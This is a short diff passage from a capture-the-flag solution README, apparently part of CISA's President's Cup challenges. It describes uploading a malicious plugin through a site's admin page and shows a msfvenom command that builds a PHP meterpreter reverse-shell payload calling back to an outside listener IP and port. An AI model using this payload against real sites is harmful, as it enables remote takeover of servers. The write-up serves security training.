cisagov/prescup-challenges/pc4/individual-b/round2-for-pieces-of-eight-theyll-steal-your-freight/solution/README.md

 You will not need the exploit python script since you have access to the admin plugins page of the site and can upload this package directly.

-An example generation of this php reverse shell payload might look like the following (you can use any port you like, but it might be a good idea to NOT use 443 so that you can use it later in the challenge:
+An example generation of this php reverse shell payload might look like the following (you can use any port you like, but it might be a good idea to ***not*** use 443 so that you can use it later in the challenge:

 ```
 msfvenom -p php/meterpreter/reverse_tcp LHOST=123.45.200.201 LPORT=5555